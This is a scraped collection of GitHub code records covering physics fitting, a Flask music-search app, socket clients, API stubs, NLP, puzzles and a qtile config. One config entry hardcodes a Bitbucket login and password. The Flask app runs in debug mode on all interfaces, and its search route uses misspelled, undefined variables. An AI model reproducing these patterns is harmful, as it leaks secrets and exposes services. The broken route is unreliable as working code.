self.omega_nm(n, m) - omega - 1j * self.gamma)\n        return c1\n\n\n    def find_rho2_explicit(self, omega) :\n        for m in range(self.spins.matrix_size): \n            for n in range(self.spins.matrix_size):\n                rrr = 0j\n                for nu in range(self.spins.matrix_size): \n                    for p in [-1., 1.]: \n                        gamma_nm = self.gamma_diag if m == n else self.gamma\n                        rrr += (self.rho0[m] - self.rho0[nu]) * self.V[n, nu] * self.V[nu, m] / ( ( self.omega_nm(n, m) - 1j * gamma_nm ) * ( self.omega_nm(nu, m) - omega * p - 1j * self.gamma ) )\n                        rrr -= (self.rho0[nu] - self.rho0[n]) * self.V[n, nu] * self.V[nu, m] / ( ( self.omega_nm(n, m) - 1j * gamma_nm ) * ( self.omega_nm(n, nu) - omega * p - 1j * self.gamma ) )\n                self.rho2[n, m] = rrr\n\n\n    def find_rho2(self, omega):\n        Vtmp = np.zeros( (self.spins.matrix_size, self.spins.matrix_size), dtype=np.complex_) \n        for m in range(self.spins.matrix_size):\n            for nu in range(self.spins.matrix_size):\n                for p in [-1., 1.]:\n                    Vtmp[nu, m] += (self.rho0[m] - self.rho0[nu]) * self.V[nu, m] / (self.omega_nm(nu, m) - omega * p - 1j * self.gamma)\n        self.rho2 = np.dot(self.V, Vtmp) - np.dot(Vtmp, self.V)\n        for m in range(self.spins.matrix_size):\n            for n in range(self.spins.matrix_size):\n                gamma_nm = self.gamma_diag if m == n else self.gamma\n                self.rho2[n, m] /= ( self.omega_nm(n, m) - 1j * gamma_nm )\n\n\n    def odmr(self, omega):\n        odmr_amp = 0j\n        self.find_rho2(omega)\n        \n        for m in range(self.spins.matrix_size):\n            for n in range(self.spins.matrix_size):\n                odmr_amp += self.rho2[m , n] * self.Sproj_eig_basis[n, m]\n\n        return odmr_amp.real\n\ndef chi_spectra_triplet(triplet, omega_range, B, theta, phi) :\n    triplet.B = B\n    triplet.phi = phi\n    triplet.theta = theta\n    triplet.J = 0j\n    triplet.Jdip = 0j\n\n    V1 = Rotation()\n    V1.euler_angles(phi, theta, 0)\n    Ur = random_unit_vector()\n    triplet.load_field_basis_Hamiltonian( V1, V1, Ur )\n    triplet.diag()\n    \n    odmr_from_triplets = ODMR_Signal(triplet)\n    odmr_from_triplets.gamma = 1\n    odmr_from_triplets.gamma_diag = 1\n    odmr_from_triplets.update_from_spin_hamiltonian()\n    odmr_from_triplets.load_rho0_thermal(3000.0)\n    \n    chi_vec = [ ]\n\n    for omega in omega_range:\n        chi = odmr_from_triplets.chi1(2*omega*math.pi)\n        chi_vec.append( chi.imag )\n    return chi_vec\n\ndef load_data(filename, freq_start, freq_stop) : \n    dataDC2 = np.loadtxt(filename, comments='%') # , usecols=(0,1,3),unpack=True)\n\n    freq_index_start = None\n    freq_index_stop = None\n\n    index = 0\n    while dataDC2[index, 0] < dataDC2[index+1, 0] : \n        if freq_index_start is None and dataDC2[index, 0]*1e-6 > freq_start:\n            freq_index_start = index\n        if freq_index_stop is None and dataDC2[index, 0]*1e-6 > freq_stop:\n            freq_index_stop = index\n        index += 1\n    freq_total_length = index+1\n    \n    freqDC2 = (dataDC2[freq_index_start:freq_index_stop, 0]) / 1e6\n    Bfield_size = int(len(dataDC2)/freq_total_length)\n\n    fieldDC2 = np.zeros(Bfield_size)\n    freq_size = freq_index_stop - freq_index_start \n    IntensityDC2 = np.zeros((Bfield_size, freq_size))\n    \n    for i in range(Bfield_size):\n        fieldDC2[i] = np.mean(dataDC2[i * freq_total_length:(i + 1) * freq_total_length, 1])\n        IntensityDC2[i, :] = dataDC2[i * freq_total_length + freq_index_start:i * freq_total_length + freq_index_stop, 3]\n    \n    return (freqDC2, fieldDC2, IntensityDC2)\n\ndef ranges_for_cycles(nAng, nField):\n    max_ang = math.radians(90.0) * (1.0 / nAng + 1.0)\n    max_field = 81\n    return np.arange(0, max_ang, max_ang/nAng), np.arange(0, max_field, max_field/nField)\n
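\n# The fit below is a linear unmixing step: scipy.optimize.nnls solves\n# min_p ||Chi @ p - Experiment||_2 subject to p >= 0 (Lawson-Hanson\n# non-negative least squares), so pVec holds the non-negative weight of\n# each simulated (Theta, Phi) spectrum.\ndef build_theory(Chi, IDC2, nAng, lenfr,lenf):\n    Experiment = IDC2.flatten()\n    pVec, rnorm1 = scipy.optimize.nnls(Chi, 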
Experiment)\n    pMatrix = np.reshape(pVec, (nAng, nAng))\n    TheoryVec = np.dot(Chi, pVec)\n    return np.reshape(TheoryVec, (lenfr, lenf))\n\ndef output(nAng, freqs, fields, lambda_filename, test_filename, Chi, ChiIm, theory_filename, TheoryMatr):\n    Lfile = open(lambda_filename, 'w+')\n    for k in range(int(nAng * nAng)):\n        index_p = 0\n        for Field in fields:\n            for Freq in freqs:\n                Lfile.write(str(Freq) + ' ' + str(Field) + ' ' + str(Chi[index_p][k]) + ' ' + str(ChiIm[index_p][k]) + '\n')\n                index_p += 1\n        Lfile.write(\"\n\")\n\n    Lfile.close()\n    Tfile = open(test_filename, 'w+')\n    index_p = 0\n    for Freq in freqs:\n        Tfile.write(str(Freq) + ' ' + str(Chi[index_p][4]) + '\n')\n        index_p += 1\n    Tfile.write(\"\n\")\n    Tfile.close()\n\n    Theoryfile = open(theory_filename, 'w+')\n    i = 0\n    for Freq in freqs:\n        j = 0\n        for Field in fields:\n            Theoryfile.write(str(Freq) + ' ' + str(Field) + ' ' + str(TheoryMatr[i][j]) + '\n')\n            j += 1\n        Theoryfile.write(\"\n\")\n        i +=1\n    Theoryfile.close()\n\ndef main():\n    freqDC2, fieldDC2, IntensityDC2 = load_data(\"testupto30up.txt\", 325, 725)\n    triplet = TwoTriplets()\n    triplet.D = 487.9\n    triplet.E = 72.9\n    nAng = 5\n    nField = len(fieldDC2)\n    Angles, MagFields = ranges_for_cycles(nAng, nField) #angles range in radians\n    Chi = np.zeros((int(len(freqDC2)*len(fieldDC2)),int(nAng*nAng)))\n    ChiIm = np.zeros((len(freqDC2)*len(fieldDC2),int(nAng*nAng)))\n    index_Phi = 0\n    index_a = 0\n    for Phi in Angles:\n        index_Theta = 0\n        for Theta in Angles:\n            index_B = 0\n            index_p = 0\n            for Field in MagFields:\n                chi_freq = chi_spectra_triplet(triplet, freqDC2, Field, Theta, Phi)\n                index_int = len(chi_freq)\n                a = np.asarray(chi_freq)\n                b = int(index_p + index_int)\n                Chi[index_p:b,index_a] = a[:]\n                index_p += index_int\n                index_B += 1\n            index_a += 1\n            index_Theta += 1\n        index_Phi += 1\n\n    TheoryMatr = build_theory(Chi, IntensityDC2, nAng, len(freqDC2),len(fieldDC2))\n    output(nAng, freqDC2, fieldDC2, 'LambdasNew.dat', 'TestNew.dat', Chi, ChiIm, 'TheoryNew.dat', TheoryMatr)\n\n\n\nmain()\n","repo_name":"KamChaos/TripletODMR","sub_path":"triplet_chi.py","file_name":"triplet_chi.py","file_ext":"py","file_size_in_byte":17047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"42202698607","text":"from flask import Flask, render_template, request, jsonify\nfrom decoder2 import wangyi\nfrom kume_music import kume\nfrom Ku_Dog import ku_dog\nfrom xiage import Song\nfrom qq_music import get_song\nfrom get_video import get_aim_video\nfrom yocool import get_deatil\nfrom miGu import miGuSong\nimport logging as log\nfrom get_video_2 import Video\napp = Flask(__name__)\n\n# Default music page\n@app.route('/')\n@app.route('/index')\ndef hello_world():\n    return render_template('music_index.html')\n\n# Video page\n@app.route('/index/video', methods=['GET', 'POST'])\ndef video():\n    if request.method == 'GET':\n        return render_template('video.html', datas={})\n    else:\n        key_word = request.form.get('search_key')\n        select_id = request.form.get('select_id')\n        log.info('Selected player: ' + str(select_id))\n        if select_id == '腾讯视频':  # Tencent Video\n            video_data_item = Video().search_by_name(key_word)\n            if len(video_data_item) == 0:\n                data = {'statu': '0', 'info': 'No matching results found, please adjust your search'}\n            else:\n                data = {'statu': '1', 'info': video_data_item, 'length': len(video_data_item)}\n        else:\n            data = {'statu': '0', 'info': 'No matching results found, please adjust your search'}\n        return render_template('video.html', datas=data)\n\n@app.route('/index/search')\ndef search():\n    key_value = request.args.get('query_value')\n    check_value 
= request.args.get(\"type\")\n log.info(\"选择的播放器是\"+str(check_vlaue)+\"请求参数是:\"+str(key_vlaue))\n if check_vlaue == '网易云音乐':\n song_url = wangyi(key_vlaue)\n if song_url != '':\n data = dict(data=song_url, statu=1)\n return jsonify(data)\n else:\n if check_vlaue == 'QQ音乐':\n song_id = get_song(key_vlaue)\n elif check_vlaue == '酷我音乐':\n song_id = kume(key_vlaue)\n elif check_vlaue == '酷狗音乐':\n song_id =ku_dog(key_vlaue)\n elif check_vlaue == \"下载吧\":\n song = Song()\n song_id = song.search_song_Byname(key_vlaue)\n elif check_vlaue == '咪咕音乐':\n mi = miGuSong()\n song_id = mi.main(key_vlaue)\n if song_id != '':\n data = dict(data=song_id, statu=0)\n return jsonify(data)\n else:\n return jsonify({})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"1984234517/music_video","sub_path":"Music.py","file_name":"Music.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71932671843","text":"import threading\nimport socket\nfrom tkinter import Tk, Frame,Button,Label, ttk\nimport sys\nimport time\n\nestado_Senal = \"Stop\"\n\n\nclass Servidor_Connect:\n\n def __init__(self):\n\n\n self.Ip_Servidor = socket.gethostname()\n self.Puerto = 1234\n self.flag = False\n\n def conectar(self):\n\n global estado_Senal\n\n while True:\n\n self.datos_envio = estado_Senal\n self.trama = self.datos_envio.encode(\"utf-8\")\n\n try:\n\n if not self.flag:\n socket_1.connect((self.Ip_Servidor,self.Puerto))\n\n self.flag = True\n\n except ConnectionRefusedError:\n\n print(\"NO CONECTADO A SERVER\")\n continue\n\n try:\n\n socket_1.send(self.trama)\n print(self.trama)\n bytes_a_recibir = 1024\n mensaje_Recibido = socket_1.recv(bytes_a_recibir)\n texto = mensaje_Recibido.decode(\"utf-8\")\n print(texto)\n\n except ConnectionResetError:\n\n print(\"No hay conexion\")\n break\n\n\nif __name__ == '__main__':\n\n socket_1 = socket.socket()\n\n ventana = Tk()\n ventana.geometry('500x100')\n ventana.wm_title('Osciloscopio')\n ventana.minsize(width=200, height=200)\n\n frame = Frame(ventana, bg='white', bd=3)\n frame.pack(fill='both')\n\n def begin():\n global estado_Senal\n estado_Senal = \"Run\"\n\n def pausar():\n global estado_Senal\n estado_Senal = \"Stop\"\n\n\n def reanudar():\n global estado_Senal\n estado_Senal = \"Play\"\n\n Button(frame, text='INICIO',width=15, bg='#FF5F00',fg='black',command=begin).pack(pady=5, side='left',expand=1)\n Button(frame, text= 'PAUSAR',width=15, bg='#0DFFF5',fg='black',command=pausar).pack(pady=5, side='left', expand=1)\n Button(frame, text='REANUDAR',width=15, bg='#FF0545',fg='black', command=reanudar).pack(pady=5, side='left', expand=1)\n\n conexion = Servidor_Connect()\n hilo1 = threading.Thread(target = conexion.conectar)\n hilo1.start()\n\n\n ventana.mainloop()","repo_name":"DarBEJ2903/APPS","sub_path":"APP2_OSCILOSCOPIO/cliente2.py","file_name":"cliente2.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7001705556","text":"import collections.abc\nimport typing\n\nimport httplib2 # type: ignore\nimport typing_extensions\n\nimport googleapiclient.discovery\nimport googleapiclient.http # type: ignore\n\nfrom .schemas import *\n\n_list = list\n\n@typing.type_check_only\nclass TestingResource(googleapiclient.discovery.Resource):\n @typing.type_check_only\n class ApplicationDetailServiceResource(googleapiclient.discovery.Resource):\n def 
getApkDetails(\n self, *, body: FileReference = ..., **kwargs: typing.Any\n ) -> GetApkDetailsResponseHttpRequest: ...\n\n @typing.type_check_only\n class ProjectsResource(googleapiclient.discovery.Resource):\n @typing.type_check_only\n class DeviceSessionsResource(googleapiclient.discovery.Resource):\n def cancel(\n self,\n *,\n name: str,\n body: CancelDeviceSessionRequest = ...,\n **kwargs: typing.Any\n ) -> EmptyHttpRequest: ...\n def create(\n self, *, parent: str, body: DeviceSession = ..., **kwargs: typing.Any\n ) -> DeviceSessionHttpRequest: ...\n def get(\n self, *, name: str, **kwargs: typing.Any\n ) -> DeviceSessionHttpRequest: ...\n def list(\n self,\n *,\n parent: str,\n filter: str = ...,\n pageSize: int = ...,\n pageToken: str = ...,\n **kwargs: typing.Any\n ) -> ListDeviceSessionsResponseHttpRequest: ...\n def list_next(\n self,\n previous_request: ListDeviceSessionsResponseHttpRequest,\n previous_response: ListDeviceSessionsResponse,\n ) -> ListDeviceSessionsResponseHttpRequest | None: ...\n def patch(\n self,\n *,\n name: str,\n body: DeviceSession = ...,\n updateMask: str = ...,\n **kwargs: typing.Any\n ) -> DeviceSessionHttpRequest: ...\n\n @typing.type_check_only\n class TestMatricesResource(googleapiclient.discovery.Resource):\n def cancel(\n self, *, projectId: str, testMatrixId: str, **kwargs: typing.Any\n ) -> CancelTestMatrixResponseHttpRequest: ...\n def create(\n self,\n *,\n projectId: str,\n body: TestMatrix = ...,\n requestId: str = ...,\n **kwargs: typing.Any\n ) -> TestMatrixHttpRequest: ...\n def get(\n self, *, projectId: str, testMatrixId: str, **kwargs: typing.Any\n ) -> TestMatrixHttpRequest: ...\n\n def deviceSessions(self) -> DeviceSessionsResource: ...\n def testMatrices(self) -> TestMatricesResource: ...\n\n @typing.type_check_only\n class TestEnvironmentCatalogResource(googleapiclient.discovery.Resource):\n def get(\n self,\n *,\n environmentType: typing_extensions.Literal[\n \"ENVIRONMENT_TYPE_UNSPECIFIED\",\n \"ANDROID\",\n \"IOS\",\n \"NETWORK_CONFIGURATION\",\n \"PROVIDED_SOFTWARE\",\n \"DEVICE_IP_BLOCKS\",\n ],\n projectId: str = ...,\n **kwargs: typing.Any\n ) -> TestEnvironmentCatalogHttpRequest: ...\n\n def new_batch_http_request(\n self,\n callback: collections.abc.Callable[\n [\n str,\n googleapiclient.http.HttpRequest,\n googleapiclient.errors.HttpError | None,\n ],\n typing.Any,\n ]\n | None = ...,\n ) -> googleapiclient.http.BatchHttpRequest: ...\n def applicationDetailService(self) -> ApplicationDetailServiceResource: ...\n def projects(self) -> ProjectsResource: ...\n def testEnvironmentCatalog(self) -> TestEnvironmentCatalogResource: ...\n\n@typing.type_check_only\nclass CancelTestMatrixResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> CancelTestMatrixResponse: ...\n\n@typing.type_check_only\nclass DeviceSessionHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> DeviceSession: ...\n\n@typing.type_check_only\nclass EmptyHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> Empty: ...\n\n@typing.type_check_only\nclass GetApkDetailsResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n 
num_retries: int = ...,\n ) -> GetApkDetailsResponse: ...\n\n@typing.type_check_only\nclass ListDeviceSessionsResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> ListDeviceSessionsResponse: ...\n\n@typing.type_check_only\nclass TestEnvironmentCatalogHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> TestEnvironmentCatalog: ...\n\n@typing.type_check_only\nclass TestMatrixHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> TestMatrix: ...\n","repo_name":"henribru/google-api-python-client-stubs","sub_path":"googleapiclient-stubs/_apis/testing/v1/resources.pyi","file_name":"resources.pyi","file_ext":"pyi","file_size_in_byte":5829,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"54"} +{"seq_id":"20390491852","text":"import os\nimport reporter\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\ndef report(type, msg):\n reporter.report(type, msg, 'Backup Manager')\n\n\nclass BackupServerWeb(BaseHTTPRequestHandler):\n backupFunction = None\n secureDeleteFunction = None\n challengeCode = os.environ['CHALLENGE_CODE']\n\n def do_HEAD(self):\n print (4)\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n if not self.PreAuth():\n self.respond({'status': 400})\n return\n\n if self.path == '/backup':\n self.RunOnDemanBackup()\n self.respond({'status': 200})\n else:\n self.respond({'status': 500})\n\n def handle_http(self, status_code, path):\n self.send_response(status_code)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n return bytes('', 'UTF-8')\n\n def respond(self, opts):\n response = self.handle_http(opts['status'], self.path)\n self.wfile.write(response)\n\n def PreAuth(self):\n if 'challenge' not in self.headers or 'name' not in self.headers:\n return False\n return BackupServerWeb.challengeCode == self.headers['challenge']\n\n def RunOnDemanBackup(self):\n fileName = BackupServerWeb.backupFunction(self.headers['name'])\n BackupServerWeb.secureDeleteFunction(fileName + '.sql', 3)\n report('info', 'On-demand backup successful [{fn}]'.format(fn=fileName))","repo_name":"teamwhileloop/ucsc-results-center","sub_path":"system/httpserver.py","file_name":"httpserver.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"54"} +{"seq_id":"20575822153","text":"import os\n\n#-- things you have to modify as long as you're on a new comp --#\n\nANDROID_SDK_PATH_LIS = [\n \"/Applications/Android\\ Studio.app/sdk/platform-tools\",\n \"/Applications/Android\\ Studio.app/sdk/tools\"\n]\nIOS_PHONEGAP_BIN_PATH = \"/Users/nubela/Workspace/phonegap-2.7.0/lib/ios/bin\"\nANDROID_PHONEGAP_BIN_PATH = \"/Users/nubela/Workspace/phonegap-2.7.0/lib/android/bin\"\nWATCHER_FILE_PATH = \"/Users/nubela/Workspace/transcompiler-watcher/src/watch.py\"\n\n#-- some config that i tried to automate, but you can modify as you deem fit --#\n\nCWD = os.getcwd()\nDICT_FILE = os.path.join(CWD, \"settings.cfg\")\nMETEOR_PORT_RANGE = range(3001, 10000)\nWORKSPACE_DIR = os.path.dirname(CWD)\nPLOP_PROJECT_PATH = os.path.join(WORKSPACE_DIR, 
\"unifide-plop\")\nRESOURCES_PATH = os.path.join(CWD, \"resources\")\nWEB_FOLDER_PATH = os.path.join(RESOURCES_PATH, \"web\")\nBITBUCKET_USERNAME = \"hello@unifide.sg\"\nBITBUCKET_PASSWD = \"thisisnotsecureatall\"\n\n#-- do not fuck below this line unless you know what you are doing --#\n\nREQUIREMENTS = [\n \"Flask==0.9\",\n \"pymongo==2.4.2\",\n \"flask-login==0.1.3\",\n \"validate_email==1.1\",\n \"unidecode==0.04.12\",\n \"py-lorem==1.2\",\n \"pil==1.1.7\",\n]\n\nPROJ_FILES = [\n os.path.join(RESOURCES_PATH, \"web.wsgi\"),\n os.path.join(RESOURCES_PATH, \"run.py\"),\n os.path.join(RESOURCES_PATH, \"cfg.py\"),\n os.path.join(RESOURCES_PATH, \"_cfg.py\"),\n os.path.join(RESOURCES_PATH, \".gitignore\"),\n]\n\nBACKEND_CFG = [\n \"brand_cfg.py\",\n \"cfg.py\",\n]\n\nPLOP_LIBRARIES = [\n \"base\",\n \"campaigns\",\n \"comments\",\n \"ecommerce\",\n \"orders\",\n \"support\",\n]","repo_name":"nubela/plop-plop","sub_path":"_cfg.py","file_name":"_cfg.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26813561001","text":"import nltk\r\nfrom nltk.corpus import brown\r\nfrom nltk.lm import MLE\r\nfrom nltk.lm.preprocessing import padded_everygram_pipeline\r\n\r\n\r\nclass ngram_language_model:\r\n def __init__(self):\r\n self.model = None\r\n self.valid_text = None\r\n\r\n def build_and_train_model(self):\r\n text = brown.sents(\r\n categories=[\r\n 'adventure', 'belles_lettres', 'editorial', 'fiction',\r\n 'government', 'hobbies', 'humor', 'learned', 'lore',\r\n 'mystery', 'news', 'religion', 'reviews', 'romance',\r\n 'science_fiction'\r\n ]\r\n )\r\n valid_text = []\r\n for sentence in text:\r\n words = []\r\n for word in sentence:\r\n words.extend(nltk.word_tokenize(word))\r\n valid_text.append(words)\r\n\r\n self.valid_text = valid_text\r\n\r\n n = 3 # length of largest everygram\r\n\r\n train_data, padded_sents = padded_everygram_pipeline(n, valid_text)\r\n\r\n self.model = MLE(n)\r\n self.model.fit(train_data, padded_sents)\r\n return\r\n\r\n def make_predictions(self, msg, number_of_predictions=5):\r\n \"\"\"\r\n makes prediction for the next possible words using the available words\r\n \"\"\"\r\n sentence = []\r\n for x in msg.strip().split():\r\n sentence.extend(nltk.word_tokenize(x))\r\n alpha = 0.1\r\n beta = 0.3\r\n gamma = 0.6\r\n predictions = []\r\n prediction_dict = {}\r\n for word in self.model.vocab:\r\n alpha_prob = alpha*self.model.score(word)\r\n beta_prob = beta*self.model.score(word, sentence[-1:])\r\n gamma_prob = gamma*self.model.score(word, sentence[-2:])\r\n prob = alpha_prob + beta_prob + gamma_prob\r\n predictions.append((word, prob))\r\n predictions.sort(key=lambda x: x[1], reverse=True)\r\n for word, prob in predictions[:number_of_predictions]:\r\n prediction_dict[word] = prob\r\n return prediction_dict\r\n\r\n\r\nif __name__ == '__main__':\r\n # ng = ngram_language_model()\r\n # ng.build_and_train_model()\r\n # ng.make_predictions(\"I am \")\r\n pass\r\n","repo_name":"sushantMoon/isi-nlp","sub_path":"assignment1/n_gram.py","file_name":"n_gram.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13460263742","text":"t = int(input())\nfor case in range(1,t+1):\n n,k = map(int,input().split())\n things = []\n for _ in range(n):\n v,c = map(int,input().split())\n things.append((v,c))\n dp = [[0] * (k+1) for _ in range(n+1)]\n for i in range(1,n+1):\n for j in 
range(1,k+1):\n volume = things[i-1][0]\n cost = things[i-1][1]\n if j < volume:\n dp[i][j] = dp[i-1][j]\n else:\n dp[i][j] = max(dp[i-1][j], dp[i-1][j-volume] + cost)\n print(f\"#{case} {dp[n][k]}\")","repo_name":"yootal/CodingTest","sub_path":"SWEA/D3/3282. 0/1 Knapsack/0/1 Knapsack.py","file_name":"0/1 Knapsack.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8859083366","text":"\ndef convert_txt_input_to_int_list(txt):\n input_list = []\n f = open(txt, \"r\")\n for x in f:\n input_list.append(int(x))\n f.close()\n return input_list\n\ndef compare_first_two_nums(the_list):\n \"\"\"Compare the 1st and second value in the list,\n append to the last list if second greater than 1st\n\n Args:\n the_list (list): Integer input from the file\n\n Return:\n (list):List of all the possible ride strategies\n \"\"\"\n scary_ride_strategies = []\n temp = 0\n prev = 0\n fun_sum = 0\n while (len(the_list)!=0):\n temp = the_list.pop(0)\n if temp>prev and len(the_list)>0:\n fun_sum+=10\n\n elif temp>prev and len(the_list)==0:\n fun_sum+=10\n scary_ride_strategies.append(fun_sum)\n\n else:\n scary_ride_strategies.append(fun_sum)\n fun_sum = 10\n\n prev = temp\n \n\n\n return scary_ride_strategies\n\n\nif __name__ == \"__main__\":\n the_input = convert_txt_input_to_int_list(\"rollercoasters_medium_sample_input.txt\")\n fun_strategies = compare_first_two_nums(the_input)\n the_max_fun = max(fun_strategies)\n f = open(\"outsample.txt\", \"w\")\n f.write(str(the_max_fun))\n f.close()","repo_name":"sibo-t/Meta-hackerthon","sub_path":"Rollercoaster/rollercoaster.py","file_name":"rollercoaster.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21785859541","text":"__all__ = [\"mobilenet\"]\n\nfrom types import MethodType\nfrom typing import List\n\nfrom icevision.utils.torch_utils import check_all_model_params_in_groups2\nfrom torch import nn\nimport torchvision\nfrom icevision.models.fastai.unet.backbones.backbone_config import (\n TorchvisionUNetBackboneConfig,\n)\n\n\ndef mobilenet_fn(pretrained: bool = True):\n model = torchvision.models.mobilenet_v2(pretrained=pretrained)\n\n features = model.features\n features.out_channels = 1280\n features.param_groups = MethodType(mobilenet_param_groups, features)\n\n return features\n\n\ndef mobilenet_param_groups(model: nn.Module) -> List[List[nn.Parameter]]:\n layers = []\n layers += [nn.Sequential(*model[0])]\n layers += [nn.Sequential(*model[1:3])]\n layers += [nn.Sequential(*model[3:12])]\n layers += [nn.Sequential(*model[12:])]\n\n param_groups = [list(layer.parameters()) for layer in layers]\n check_all_model_params_in_groups2(model, param_groups)\n\n return param_groups\n\n\nmobilenet = TorchvisionUNetBackboneConfig(backbone_fn=mobilenet_fn)\n","repo_name":"airctic/icevision","sub_path":"icevision/models/fastai/unet/backbones/mobilenet_configs.py","file_name":"mobilenet_configs.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":839,"dataset":"github-code","pt":"54"} +{"seq_id":"21271453468","text":"\"\"\"\n \n .88888888:.\n 88888888.88888.\n .8888888888888888.\n 888888888888888888\n 88' _`88'_ `88888\n 88 88 88 88 88888\n 88_88_::_88_:88888\n 88:::,::,:::::8888\n 88`:::::::::'`8888\n .88 `::::' 8:88.\n 8888 `8:888.\n .8888' `888888.\n .8888:.. .::. ...:'8888888:.\n .8888.' 
:' `'::`88:88888\n          .8888   '             `.888:8888.\n         888:8         .           888:88888\n       .888:88        .:           888:88888:\n       8888888.       ::           88:888888\n       `.::.888.      ::          .88888888\n      .::::::.888.    ::         :::`8888'.:.\n     ::::::::::.888   '         .::::::::::::\n     ::::::::::::.8    '      .:8::::::::::::.\n    .::::::::::::::.        .:888:::::::::::::\n    :::::::::::::::88:.__..:88888:::::::::::'\n     `'.:::::::::::88888888888.88:::::::::'\n           `':::_:' -- '' -'-' `':_::::'`\n\"\"\"\n# My settings\nfrom settings.keys import mod, keys\nfrom settings.groups import groups\n\n\nfrom libqtile import bar, layout, widget, hook\nfrom libqtile.config import Click, Drag, Group, Match, Screen\n\n\nimport os\nimport subprocess\n\n\n\nlayouts = [\n    layout.Columns(\n        #order_normal=\"#D3D3D3\",\n        border_focus = '#81a1c1',\n        border_width=2,\n        margin=4,\n        margin_on_single=8),\n    layout.Max(),\n    # Try more layouts by unleashing below layouts.\n    # layout.Stack(num_stacks=2),\n    # layout.Bsp(),\n    # layout.Matrix(),\n    # layout.MonadTall(),\n    # layout.MonadWide(),\n    # layout.RatioTile(),\n    # layout.Tile(),\n    # layout.TreeTab(),\n    # layout.VerticalTile(),\n    # layout.Zoomy(),\n]\n\nwidget_defaults = dict(\n    font=\"Hack Nerd Font\",\n    fontsize=18,\n    padding=3,\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n    Screen(\n        top=bar.Bar(\n            [\n                widget.GroupBox(disable_drag=True), \n                widget.Prompt(),\n                widget.WindowName(),\n                widget.Chord(\n                    chords_colors={\n                        \"launch\": (\"#ff0000\", \"#ffffff\"),\n                    },\n                    name_transform=lambda name: name.upper(),\n                ),\n                widget.CurrentLayout(),\n                widget.TextBox(\"default config\", name=\"default\"),\n                widget.TextBox(\"Press <M-r> to spawn\", foreground=\"#d75f5f\"),\n                widget.Systray(),\n                widget.Clock(format=\"%Y-%m-%d %a %I:%M %p\"),\n                \n                widget.QuickExit(),\n                widget.Volume(fmt='Vol: {}'),\n            ],\n            24,\n            border_width=[2,2,2,2], # Draw top and bottom borders\n            border_color=[\"ff00ff\", \"ff00ff\", \"ff00ff\", \"ff00ff\"], # Borders are magenta\n            margin = [10,0,4,2] # Space around the bar, given as a list of integers [N E S W].\n        ),\n    ),\n]\n\n# Hooks\n\n@hook.subscribe.startup_once\ndef autostart():\n    home = os.path.expanduser('~/.config/qtile/scripts/autostart.sh')\n    subprocess.run([home])\n\n\n\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: list\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(\n    float_rules=[\n        # Run the utility of `xprop` to see the wm class and name of an X client.\n        *layout.Floating.default_float_rules,\n        Match(wm_class=\"confirmreset\"), # gitk\n        Match(wm_class=\"makebranch\"), # gitk\n        Match(wm_class=\"maketag\"), # gitk\n        Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n        Match(title=\"branchdialog\"), # gitk\n        Match(title=\"pinentry\"), # GPG key password entry\n        Match(title=\"Picture-in-Picture\"),\n    ]\n)\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\nreconfigure_screens = True\n\n# If things like steam games want to auto-minimize themselves when losing\n# focus, should we respect this or not?\nauto_minimize = True\n\n# When using the Wayland backend, this can be used to configure input devices.\nwl_input_rules = None\n\n# XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this\n# string besides java UI toolkits; you can see several discussions on the\n# mailing lists, GitHub issues, and other WM documentation that suggest setting\n# this string if your java app doesn't work correctly. 
